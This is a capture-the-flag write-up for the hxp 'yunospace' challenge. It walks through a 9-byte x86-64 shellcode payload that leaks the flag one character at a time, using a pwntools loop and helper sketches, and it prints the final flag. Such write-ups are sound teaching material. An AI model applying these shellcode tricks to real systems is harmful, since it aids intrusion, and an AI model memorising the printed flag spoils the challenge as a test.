How does free code execution sound to you? If only the whole thing wasn’t that narrow.

yunospace was a very interesting challenge: it had a very clear target that was very tricky to achieve.

At first yunospace creates two empty mmapped regions at randomized addresses; these are used as the code region (rx) and the stack region (rw).

9 bytes are read from stdin and placed at the beginning of the code region. One character of the flag, at an index we choose, is placed right after our input. Then all registers except rsp, which points into the middle of the stack region, are zeroed and execution jumps to our code.

So clearly we have to write 9 bytes of machine code with a working empty stack to print the flag character.

After some hours spent experimenting and browsing the Intel assembly manual, this is what we came up with:

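  000000:       0f 05                   syscall
  000002:       01 ca                   add    edx,ecx
  000004:       51                      push   rcx
  000005:       5e                      pop    rsi
  000006:       ac                      lods   al,BYTE PTR ds:[rsi]
  000007:       0f 05                   syscall

from pwn import *

flag = ""
# The flag has 58 characters; each connection leaks one of them.
for i in range(58):
    c = remote("", 8664)
    # ... send the index i and the 9-byte payload ...
    out = c.recv(10)
    # Bytes 0..5 of the output are the tail of our own code, byte 6 is the flag character.
    flag += chr(out[6])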
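
The 9 payload bytes can be put together by hand from the hex column of the disassembly. A minimal sketch, where `INSTRUCTIONS` and `PAYLOAD` are names chosen here for illustration and not taken from the original script:

```python
# Hex column of the disassembly, one entry per instruction.
INSTRUCTIONS = [
    ("syscall",      "0f05"),
    ("add edx, ecx", "01ca"),
    ("push rcx",     "51"),
    ("pop rsi",      "5e"),
    ("lodsb",        "ac"),
    ("syscall",      "0f05"),
]

PAYLOAD = bytes.fromhex("".join(hexbytes for _, hexbytes in INSTRUCTIONS))

# The challenge reads exactly 9 bytes, so the payload has to fit exactly.
assert len(PAYLOAD) == 9
print(PAYLOAD.hex())
```

Keeping the mnemonics next to the bytes makes it easy to swap a single instruction while hunting for a shorter encoding.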

So what is happening here?

00:    0f 05    syscall

Since all registers are 0, this is effectively a read(0, NULL, 0): the syscall tries to read 0 bytes from stdin into a NULL pointer. Conveniently this does not crash, and it has the very important side effect of loading the address of the instruction after the syscall into rcx. A rip-relative lea would need 7 bytes, and a call/pop combo would need 6 bytes. This version, combined with the next instruction, only uses 4!
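
The byte counts can be checked by writing the encodings out. The sketch below is hand-assembled from the x86-64 opcode tables, and picking rcx as the target register for the lea and call/pop variants is an assumption made here for comparison:

```python
# Hand-assembled encodings (illustrative; the register choice is an assumption).
SYSCALL = bytes.fromhex("0f05")                # leaves the next instruction's address in rcx
ADD_EDX_ECX = bytes.fromhex("01ca")
LEA_RCX_RIP = bytes.fromhex("488d0d00000000")  # lea rcx, [rip+0]: REX.W, 8D, ModRM, disp32
CALL_POP = bytes.fromhex("e800000000") + bytes.fromhex("59")  # call $+5 ; pop rcx

sizes = {
    "lea rcx, [rip+0]": len(LEA_RCX_RIP),
    "call $+5 ; pop rcx": len(CALL_POP),
    "syscall ; add edx, ecx": len(SYSCALL + ADD_EDX_ECX),
}
for name, size in sizes.items():
    print(f"{size} bytes  {name}")
```

The last entry counts the add as well, because in the payload those 4 bytes provide both the code address and the write length.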

02:    01 ca    add    edx,ecx

This adds ecx to edx, which specifies the length for the write syscall. We just need edx to be >6 to print the flag character after our code, so any big value works for us; we do not care about a page fault after we have received our output. Most importantly, this instruction starts with the opcode byte 01, which will be used later.
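
The effect of the 32-bit add on the length can be modelled in a few lines. This is only a sketch: `add_edx_ecx` is a helper written for this illustration, and the address `0x7f3a12345002` is made up, since the real mapping address is randomized:

```python
MASK32 = 0xFFFFFFFF

def add_edx_ecx(rdx: int, rcx: int) -> int:
    """Model `add edx, ecx`: a 32-bit add whose result is zero-extended into rdx."""
    return ((rdx & MASK32) + (rcx & MASK32)) & MASK32

# Hypothetical address of the add instruction (code region base + 2).
rcx = 0x7F3A12345002
rdx = add_edx_ecx(0, rcx)

# Only the low 32 bits of the address survive as the write length.
assert rdx == rcx & MASK32
assert rdx > 6
print(hex(rdx))
```

Under this model the length is the low 32 bits of a page-aligned base plus 2, so it would only be too small if those low bits of the base happened to be all zero.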

04:    51       push   rcx
05:    5e       pop    rsi

This moves the 64-bit address from rcx to rsi, which specifies the buffer that write prints. It only needs 2 bytes because push and pop are two of the few instructions that do not need a REX prefix for 64-bit operands.

06:    ac       lods   al,BYTE PTR ds:[rsi]

lodsb loads the byte at the address in rsi into al and then increments rsi (with the direction flag clear). So al = [rsi]; rsi++. Since rsi points to our add edx,ecx instruction, whose first byte is the opcode 01, and the earlier read left rax at 0, this sets rax to 1, the syscall number for write! This was the last bit of magic we had to find to save that crucial last byte!
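
The lodsb step can be traced against the payload itself. In this sketch `lodsb` is a small model written for illustration, and addresses are expressed as offsets from the start of the code region:

```python
CODE = bytes.fromhex("0f0501ca515eac0f05")  # the 9 payload bytes

def lodsb(mem: bytes, rax: int, rsi: int):
    """Model `lodsb` with the direction flag clear: al = mem[rsi]; rsi += 1."""
    al = mem[rsi]
    rax = (rax & ~0xFF) | al  # only the low byte of rax is replaced
    return rax, rsi + 1

# rax is 0 after read(0, NULL, 0) returned 0; rsi holds the offset of `add edx, ecx`.
rax, rsi = lodsb(CODE, rax=0, rsi=2)

assert rax == 1  # syscall number of write on x86-64 Linux
assert rsi == 3  # the buffer now starts one byte into the add instruction
```

The increment of rsi is why the write buffer begins at the address of add + 1 and not at the add itself.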

07:    0f 05    syscall

write(0, <address of add + 1>, (32-bit truncated) <address of add>). This writes to stdin (not stdout!) since rdi is zero. But we still get the output on our terminal! (Thank you Linux!) This behaviour means we do not have to set rdi to 1 for printing to stdout, which saves us 2 bytes.
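
The layout of the resulting output explains why the script reads index 6. The sketch below rests on several assumptions: the code region is modelled as a single zero-filled 4096-byte page, the write is assumed to stop at the end of that page, and `final_write_output` is a helper invented for this illustration:

```python
PAYLOAD = bytes.fromhex("0f0501ca515eac0f05")

def final_write_output(flag_char: bytes, page_size: int = 4096) -> bytes:
    """Bytes the last write would emit, with offsets relative to the code region."""
    page = (PAYLOAD + flag_char).ljust(page_size, b"\x00")
    rsi = 2 + 1  # offset of `add edx, ecx`, bumped once by lodsb
    # edx is far larger than the page, so assume the output ends with the mapping.
    return page[rsi:]

out = final_write_output(b"h")

# The first six bytes are the tail of our own code: ca 51 5e ac 0f 05.
assert out[:6] == PAYLOAD[3:]
print(chr(out[6]))  # prints "h"
```

Offsets 3 to 8 of the region are still payload, so the flag character at offset 9 lands at index 6 of the received data, matching out[6] in the exploit loop.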

The program subsequently crashes but we already have what we want so we don’t care.

Flag is hxp{y0u_w0uldnt_b3l13v3_h0w_m4ny_3mulat0rs_g0t_th1s_wr0ng}